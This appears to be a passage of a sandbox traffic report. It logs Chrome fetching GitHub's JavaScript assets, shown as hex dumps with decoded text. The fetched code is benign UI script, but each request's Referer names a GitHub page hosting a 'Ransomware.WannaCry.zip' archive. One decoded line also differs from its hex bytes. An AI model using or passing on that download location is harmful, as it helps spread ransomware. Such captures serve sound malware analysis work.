                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 61 72 28 2d 2d 62 61 73 65 2d 73 69 7a 65 2d 31 36 2c 20 31 36 70 78 29 22 2c 6d 61 72 67 69 6e 3a 22 30 22 2c 70 6c 61 63 65 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 2c 77 69 64 74 68 3a 22 76 61 72 28 2d 2d 62 61 73 65 2d 73 69 7a 65 2d 31 36 2c 20 31 36 70 78 29 22 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 65 3f 22 61 63 63 65 6e 74 2e 66 67 22 3a 22 63 61 6e 76 61 73 2e 64 65 66 61 75 6c 74 22 2c 74 72 61 6e 73 69 74 69 6f 6e 3a 65 3f 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 2c 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 38 30 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 33 33 2c 20 31 2c 20 30 2e 36 38 2c 20 31 29 22 3a 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 2c 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 38
                                                                                      Data Ascii: ar(--base-size-16, 16px)",margin:"0",placeContent:"center",width:"var(--base-size-16, 16px)",backgroundColor:e?"accent.fg":"canvas.default",transition:e?"background-color, border-color 80ms cubic-bezier(0.33, 1, 0.68, 1)":"background-color, border-color 8
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 43 41 32 4c 6a 6b 30 4f 44 4d 31 54 44 45 77 4c 6a 63 78 4f 44 59 67 4d 43 34 79 4d 54 6b 32 4d 6a 56 44 4d 54 41 75 4f 44 55 35 4e 53 41 77 4c 6a 41 33 4f 44 6b 35 4d 6a 4d 67 4d 54 45 75 4d 44 55 77 4e 43 41 77 49 44 45 78 4c 6a 49 30 4f 54 55 67 4d 45 4d 78 4d 53 34 30 4e 44 67 31 49 44 41 67 4d 54 45 75 4e 6a 4d 35 4e 53 41 77 4c 6a 41 33 4f 44 6b 35 4d 6a 4d 67 4d 54 45 75 4e 7a 67 77 4d 79 41 77 4c 6a 49 78 4f 54 59 79 4e 56 6f 69 49 47 5a 70 62 47 77 39 49 6e 64 6f 61 58 52 6c 49 69 38 2b 43 6a 77 76 63 33 5a 6e 50 67 6f 3d 27 29 22 2c 6d 61 73 6b 53 69 7a 65 3a 22 37 35 25 22 2c 6d 61 73 6b 52 65 70 65 61 74 3a 22 6e 6f 2d 72 65 70 65 61 74 22 2c 6d 61 73 6b 50 6f 73 69 74 69 6f 6e 3a 22 63 65 6e 74 65 72 22 2c 61 6e 69 6d 61 74 69 6f 6e 3a 65 3f
                                                                                      Data Ascii: CA2Ljk0ODM1TDEwLjcxODYgMC4yMTk2MjVDMTAuODU5NSAwLjA3ODk5MjMgMTEuMDUwNCAwIDExLjI0OTUgMEMxMS40NDg1IDAgMTEuNjM5NSAwLjA3ODk5MjMgMTEuNzgwMyAwLjIxOTYyNVoiIGZpbGw9IndoaXRlIi8+Cjwvc3ZnPgo=')",maskSize:"75%",maskRepeat:"no-repeat",maskPosition:"center",animation:e?


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      50192.168.2.1649754185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:24 UTC736OUTGET /assets/vendors-node_modules_primer_react_lib-esm_Overlay_Overlay_js-node_modules_primer_react_lib-es-fa1130-829932cf63db.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:24 UTC687INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 6535
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Wed, 14 Feb 2024 22:09:23 GMT
                                                                                      ETag: 0x8DC2DA99A0C2A4C
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:24 GMT
                                                                                      Age: 1941881
                                                                                      X-Served-By: cache-iad-kjyo7100112-IAD, cache-ewr18149-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 775, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: e71ab46507a239a40ffdc5f50eb21d747e3f7803
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 4f 76 65 72 6c 61 79 5f 4f 76 65 72 6c 61 79 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 2d 66 61 31 31 33 30 22 5d 2c 7b 38 36 37 37 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 5a 50 3a 28 29 3d 3e 70 2c 71 4b 3a 28 29 3d 3e 76 2c 71 73 3a 28 29 3d 3e 68 7d 29 3b 76 61 72 20 72 3d 6e 28 31 35 33 38 38 29 2c 61 3d 6e 28 36 37 32 39 34 29
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_Overlay_Overlay_js-node_modules_primer_react_lib-es-fa1130"],{8677:(e,t,n)=>{n.d(t,{ZP:()=>p,qK:()=>v,qs:()=>h});var r=n(15388),a=n(67294)
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 6d 61 78 48 65 69 67 68 74 26 26 76 5b 65 2e 6d 61 78 48 65 69 67 68 74 5d 2c 65 3d 3e 6d 5b 65 2e 77 69 64 74 68 7c 7c 22 61 75 74 6f 22 5d 2c 65 3d 3e 65 2e 6f 76 65 72 66 6c 6f 77 3f 65 2e 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 2c 32 30 30 2c 28 30 2c 69 2e 55 32 29 28 22 61 6e 69 6d 61 74 69 6f 6e 2e 65 61 73 65 4f 75 74 43 75 62 69 63 22 29 2c 73 2e 5a 29 2c 70 3d 61 2e 66 6f 72 77 61 72 64 52 65 66 28 28 7b 6f 6e 43 6c 69 63 6b 4f 75 74 73 69 64 65 3a 65 2c 72 6f 6c 65 3a 74 3d 22 6e 6f 6e 65 22 2c 69 6e 69 74 69 61 6c 46 6f 63 75 73 52 65 66 3a 6e 2c 72 65 74 75 72 6e 46 6f 63 75 73 52 65 66 3a 72 2c 69 67 6e 6f 72 65 43 6c 69 63 6b 52 65 66 73 3a 73 2c 6f 6e 45 73 63 61 70 65 3a 76 2c 76 69 73 69 62 69 6c 69 74 79 3a 6d 3d 22 76 69 73
                                                                                      Data Ascii: maxHeight&&v[e.maxHeight],e=>m[e.width||"auto"],e=>e.overflow?e.overflow:"hidden",200,(0,i.U2)("animation.easeOutCubic"),s.Z),p=a.forwardRef(({onClickOutside:e,role:t="none",initialFocusRef:n,returnFocusRef:r,ignoreClickRefs:s,onEscape:v,visibility:m="vis
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 30 7d 3a 7b 6c 65 66 74 3a 78 7d 2c 72 69 67 68 74 3a 67 2c 74 6f 70 3a 79 2c 62 6f 74 74 6f 6d 3a 6b 2c 70 6f 73 69 74 69 6f 6e 3a 5f 2c 22 2d 2d 73 74 79 6c 65 64 2d 6f 76 65 72 6c 61 79 2d 76 69 73 69 62 69 6c 69 74 79 22 3a 6d 7d 7d 29 29 29 7d 29 7d 2c 34 38 31 35 38 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 61 3a 28 29 3d 3e 75 7d 29 3b 76 61 72 20 72 3d 6e 28 36 37 32 39 34 29 2c 61 3d 6e 28 34 38 30 33 30 29 2c 6c 3d 6e 28 36 36 30 34 34 29 2c 69 3d 6e 28 38 39 33 30 29 2c 6f 3d 6e 28 36 39 38 34 38 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 3d 5b 5d 29 7b 6c 65 74 20 6e 3d 28 30 2c 6c 2e 69 29 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 66 6c 6f 61 74 69 6e 67 45 6c 65 6d 65 6e 74 52 65 66 29 2c 75 3d 28 30 2c 6c 2e 69
                                                                                      Data Ascii: 0}:{left:x},right:g,top:y,bottom:k,position:_,"--styled-overlay-visibility":m}})))})},48158:(e,t,n)=>{n.d(t,{a:()=>u});var r=n(67294),a=n(48030),l=n(66044),i=n(8930),o=n(69848);function u(e,t=[]){let n=(0,l.i)(null==e?void 0:e.floatingElementRef),u=(0,l.i
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 65 6e 74 65 64 29 62 72 65 61 6b 7d 7d 6c 65 74 20 6c 3d 7b 7d 2c 69 3d 30 2c 6f 3d 28 65 2c 74 3d 5b 65 5d 29 3d 3e 7b 6c 65 74 20 6e 3d 28 30 2c 72 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 65 2c 74 29 2c 6f 3d 28 30 2c 72 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 65 3d 3e 7b 22 45 73 63 61 70 65 22 3d 3d 3d 65 2e 6b 65 79 26 26 6e 28 65 29 7d 2c 5b 6e 5d 29 2c 75 3d 28 30 2c 72 2e 75 73 65 4d 65 6d 6f 29 28 28 29 3d 3e 69 2b 2b 2c 5b 5d 29 3b 28 30 2c 72 2e 75 73 65 45 66 66 65 63 74 29 28 28 29 3d 3e 28 30 3d 3d 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6c 29 2e 6c 65 6e 67 74 68 26 26 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6b 65 79 64 6f 77 6e 22 2c 61 29 2c 6c 5b 75 5d 3d 6f 2c 28 29 3d 3e 7b 64 65 6c 65 74 65
                                                                                      Data Ascii: ented)break}}let l={},i=0,o=(e,t=[e])=>{let n=(0,r.useCallback)(e,t),o=(0,r.useCallback)(e=>{"Escape"===e.key&&n(e)},[n]),u=(0,r.useMemo)(()=>i++,[]);(0,r.useEffect)(()=>(0===Object.keys(l).length&&document.addEventListener("keydown",a),l[u]=o,()=>{delete
                                                                                      2024-03-23 14:47:24 UTC1023INData Raw: 66 66 65 63 74 29 28 28 29 3d 3e 7b 69 66 28 72 29 72 65 74 75 72 6e 3b 6c 65 74 20 61 3d 74 2e 63 75 72 72 65 6e 74 3b 69 66 28 65 26 26 65 2e 63 75 72 72 65 6e 74 29 65 2e 63 75 72 72 65 6e 74 2e 66 6f 63 75 73 28 29 3b 65 6c 73 65 20 69 66 28 6e 2e 63 75 72 72 65 6e 74 29 7b 6c 65 74 20 65 3d 28 30 2c 6c 2e 68 54 29 28 6e 2e 63 75 72 72 65 6e 74 29 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 6e 75 6c 6c 3d 3d 65 7c 7c 65 2e 66 6f 63 75 73 28 29 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 75 6c 6c 3d 3d 61 7c 7c 61 2e 66 6f 63 75 73 28 29 7d 7d 2c 5b 65 2c 74 2c 6e 2c 72 5d 29 7d 28 7b 63 6f 6e 74 61 69 6e 65 72 52 65 66 3a 66 2c 72 65 74 75 72 6e 46 6f 63 75 73 52 65 66 3a 74 2c 69 6e 69 74 69 61 6c 46 6f 63 75 73 52 65 66 3a 6e 2c 70 72
                                                                                      Data Ascii: ffect)(()=>{if(r)return;let a=t.current;if(e&&e.current)e.current.focus();else if(n.current){let e=(0,l.hT)(n.current).next().value;null==e||e.focus()}return function(){null==a||a.focus()}},[e,t,n,r])}({containerRef:f,returnFocusRef:t,initialFocusRef:n,pr


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      51192.168.2.1649755185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:24 UTC736OUTGET /assets/vendors-node_modules_primer_react_lib-esm_Text_Text_js-node_modules_primer_react_lib-esm_Text-7845da-c300384a527b.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:24 UTC687INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 16064
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Wed, 13 Mar 2024 16:24:33 GMT
                                                                                      ETag: 0x8DC437A11555D5B
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:24 GMT
                                                                                      Age: 770257
                                                                                      X-Served-By: cache-iad-kjyo7100141-IAD, cache-lga21947-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 791, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 3642bcbcbd1e0a4b94da42fe535ded5a4cbee3ae
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 54 65 78 74 5f 54 65 78 74 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 54 65 78 74 2d 37 38 34 35 64 61 22 5d 2c 7b 35 30 39 31 39 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 68 3a 28 29 3d 3e 73 7d 29 3b 76 61 72 20 69 3d 6e 28 36 37 32 39 34 29 2c 72 3d 6e 28 32 31 34 31 33 29 2c 6f 3d 6e 28 37 32 36 31 29 2c 61 3d 6e 28 38 38 32
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_Text_Text_js-node_modules_primer_react_lib-esm_Text-7845da"],{50919:(e,t,n)=>{n.d(t,{h:()=>s});var i=n(67294),r=n(21413),o=n(7261),a=n(882
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 32 20 30 20 30 30 2d 37 2d 37 22 2c 73 74 72 6f 6b 65 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 73 74 72 6f 6b 65 57 69 64 74 68 3a 22 32 22 2c 73 74 72 6f 6b 65 4c 69 6e 65 63 61 70 3a 22 72 6f 75 6e 64 22 2c 76 65 63 74 6f 72 45 66 66 65 63 74 3a 22 6e 6f 6e 2d 73 63 61 6c 69 6e 67 2d 73 74 72 6f 6b 65 22 7d 29 29 7d 73 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 53 70 69 6e 6e 65 72 22 3b 6c 65 74 20 63 3d 28 30 2c 72 2e 5a 50 29 28 73 29 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 53 70 69 6e 6e 65 72 5f 5f 53 74 79 6c 65 64 53 70 69 6e 6e 65 72 22 2c 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 31 6b 6e 74 36 38 36 2d 30 22 7d 29 28 5b 22 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 2d 6b 65 79 66 72 61
                                                                                      Data Ascii: 2 0 00-7-7",stroke:"currentColor",strokeWidth:"2",strokeLinecap:"round",vectorEffect:"non-suserng-stroke"}))}s.displayName="Spinner";let c=(0,r.ZP)(s).withConfig({displayName:"Spinner__StyledSpinner",componentId:"sc-1knt686-0"})(["@keyframes rotate-keyfra
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 3f 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 67 2e 75 2c 7b 74 65 78 74 3a 65 2c 64 69 72 65 63 74 69 6f 6e 3a 6e 2c 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 7d 7d 2c 74 29 3a 74 29 2c 78 3d 28 30 2c 69 2e 66 6f 72 77 61 72 64 52 65 66 29 28 28 7b 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 65 2c 74 6f 6f 6c 74 69 70 44 69 72 65 63 74 69 6f 6e 3a 74 2c 63 68 69 6c 64 72 65 6e 3a 6e 2c 69 63 6f 6e 3a 72 2c 73 78 3a 6f 2c 76 61 72 69 61 6e 74 3a 61 3d 22 69 6e 76 69 73 69 62 6c 65 22 2c 2e 2e 2e 6c 7d 2c 73 29 3d 3e 7b 6c 65 74 20 70 3d 22 69 6e 76 69 73 69 62 6c 65 22 3d 3d 3d 61 3f 75 28 29 28 68 2c 6f 7c 7c 7b 7d 29 3a 6f 7c 7c 7b 7d 3b 72 65 74 75 72 6e 28 21 72 7c 7c 65 29 26 26 28 6e 7c 7c 65 29 7c 7c 63 6f 6e 73
                                                                                      Data Ascii: ?i.createElement(g.u,{text:e,direction:n,sx:{display:"inline-block"}},t):t),x=(0,i.forwardRef)(({"aria-label":e,tooltipDirection:t,children:n,icon:r,sx:o,variant:a="invisible",...l},s)=>{let p="invisible"===a?u()(h,o||{}):o||{};return(!r||e)&&(n||e)||cons
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 2c 52 3d 67 26 26 28 22 74 72 61 69 6c 69 6e 67 22 3d 3d 3d 6d 7c 7c 21 21 28 22 61 75 74 6f 22 3d 3d 3d 6d 26 26 21 74 29 29 2c 4c 3d 28 30 2c 69 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 65 3d 3e 7b 5f 28 21 30 29 2c 6b 26 26 6b 28 65 29 7d 2c 5b 6b 5d 29 2c 24 3d 28 30 2c 69 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 65 3d 3e 7b 5f 28 21 31 29 2c 5a 26 26 5a 28 65 29 7d 2c 5b 5a 5d 29 3b 72 65 74 75 72 6e 20 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 73 2e 5a 50 2c 7b 62 6c 6f 63 6b 3a 64 2c 63 6c 61 73 73 4e 61 6d 65 3a 57 2c 76 61 6c 69 64 61 74 69 6f 6e 53 74 61 74 75 73 3a 62 2c 63 6f 6e 74 72 61 73 74 3a 75 2c 64 69 73 61 62 6c 65 64 3a 66 2c 6d 6f 6e 6f 73 70 61 63 65 3a 68 2c 73 78 3a 78 2c 73 69 7a 65 3a 77 2c 77 69 64 74 68 3a 53 2c 6d 69
                                                                                      Data Ascii: ,R=g&&("trailing"===m||!!("auto"===m&&!t)),L=(0,i.useCallback)(e=>{_(!0),k&&k(e)},[k]),$=(0,i.useCallback)(e=>{_(!1),Z&&Z(e)},[Z]);return i.createElement(s.ZP,{block:d,className:W,validationStatus:b,contrast:u,disabled:f,monospace:h,sx:x,size:w,width:S,mi
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 69 29 26 26 28 65 5b 69 5d 3d 6e 5b 69 5d 29 7d 72 65 74 75 72 6e 20 65 7d 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 6c 65 74 20 66 3d 28 7b 63 68 69 6c 64 72 65 6e 3a 65 2c 73 69 7a 65 3a 74 7d 29 3d 3e 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 72 2e 5a 2c 7b 73 78 3a 7b 66 6c 65 78 53 68 72 69 6e 6b 3a 30 2c 6c 69 6e 65 48 65 69 67 68 74 3a 30 2c 6d 61 72 67 69 6e 52 69 67 68 74 3a 74 26 26 5b 22 6c 61 72 67 65 22 2c 22 78 6c 61 72 67 65 22 5d 2e 69 6e 63 6c 75 64 65 73 28 74 29 3f 32 3a 31 7d 7d 2c 65 29 3b 66 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 4c 65 61 64 69 6e 67 56 69 73 75 61 6c 43 6f 6e 74 61 69 6e 65 72 22
                                                                                      Data Ascii: .prototype.hasOwnProperty.call(n,i)&&(e[i]=n[i])}return e}).apply(this,arguments)}let f=({children:e,size:t})=>i.createElement(r.Z,{sx:{flexShrink:0,lineHeight:0,marginRight:t&&["large","xlarge"].includes(t)?2:1}},e);f.displayName="LeadingVisualContainer"
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 6a 65 63 74 2e 61 73 73 69 67 6e 3f 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 2e 62 69 6e 64 28 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6e 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 69 20 69 6e 20 6e 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 69 29 26 26 28 65 5b 69 5d 3d 6e 5b 69 5d 29 7d 72 65 74 75 72 6e 20 65 7d 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 6c 65 74 20 63 3d 7b 73 6d 61 6c 6c 3a 22 31 36 70 78 22 2c 6d 65 64 69 75 6d 3a 22 32 30 70 78 22 2c 6c 61 72 67 65 3a 22 32 34 70 78 22 2c 78 6c 61 72 67
                                                                                      Data Ascii: ject.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(e[i]=n[i])}return e}).apply(this,arguments)}let c={small:"16px",medium:"20px",large:"24px",xlarg
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 2c 72 3d 6e 28 38 35 35 32 39 29 2c 6f 3d 6e 28 31 35 33 38 38 29 2c 61 3d 6e 28 32 37 39 39 39 29 2c 6c 3d 6e 28 34 32 33 37 39 29 2c 73 3d 6e 28 31 35 31 37 33 29 2c 63 3d 6e 28 34 32 33 29 3b 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 72 65 74 75 72 6e 28 64 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3f 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 2e 62 69 6e 64 28 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6e 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 69 20 69 6e 20 6e 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 69 29 26 26 28 65 5b 69 5d 3d 6e 5b
                                                                                      Data Ascii: ,r=n(85529),o=n(15388),a=n(27999),l=n(42379),s=n(15173),c=n(423);function d(){return(d=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(e[i]=n[
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 2e 63 68 69 6c 64 72 65 6e 2c 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 66 2c 64 28 7b 61 73 3a 74 3f 22 73 70 61 6e 22 3a 22 62 75 74 74 6f 6e 22 2c 74 61 62 49 6e 64 65 78 3a 74 3f 2d 31 3a 76 6f 69 64 20 30 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 74 3f 65 3a 22 52 65 6d 6f 76 65 20 74 6f 6b 65 6e 22 2c 73 69 7a 65 3a 6e 7d 2c 6f 29 2c 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 72 2e 58 49 63 6f 6e 2c 7b 73 69 7a 65 3a 75 28 6e 29 7d 29 29 29 3b 67 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 52 65 6d 6f 76 65 54 6f 6b 65 6e 42 75 74 74 6f 6e 22 7d 2c 35 33 37 32 32 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 5a 3a 28 29 3d 3e 72 7d 29 3b 76 61 72 20 69 3d 6e 28 31 35 33 38 38 29 3b 6c 65 74 20 72 3d 28 30 2c 69 2e 5a 50 29 28 22 73
                                                                                      Data Ascii: .children,i.createElement(f,d({as:t?"span":"button",tabIndex:t?-1:void 0,"aria-label":t?e:"Remove token",size:n},o),i.createElement(r.XIcon,{size:u(n)})));g.displayName="RemoveTokenButton"},53722:(e,t,n)=>{n.d(t,{Z:()=>r});var i=n(15388);let r=(0,i.ZP)("s
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 65 6d 65 6e 74 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 54 65 78 74 49 6e 70 75 74 2d 69 63 6f 6e 22 7d 2c 65 29 3a 6e 75 6c 6c 3b 61 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 54 65 78 74 49 6e 70 75 74 49 6e 6e 65 72 56 69 73 75 61 6c 53 6c 6f 74 22 7d 2c 32 30 36 38 32 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 46 44 3a 28 29 3d 3e 75 2c 51 6b 3a 28 29 3d 3e 64 2c 5a 50 3a 28 29 3d 3e 66 7d 29 3b 76 61 72 20 69 3d 6e 28 31 35 33 38 38 29 2c 72 3d 6e 28 32 37 39 39 39 29 2c 6f 3d 6e 28 34 32 33 37 39 29 2c 61 3d 6e 28 31 35 31 37 33 29 3b 6c 65 74 20 6c 3d 28 30 2c 72 2e 62 55 29 28 7b 76 61 72 69 61 6e 74 73 3a 7b 73 6d 61 6c 6c 3a 7b 6d 69 6e 48 65 69 67 68 74 3a 22 32 38 70 78 22 2c 70 78 3a 32 2c 70 79 3a 22 33 70 78 22
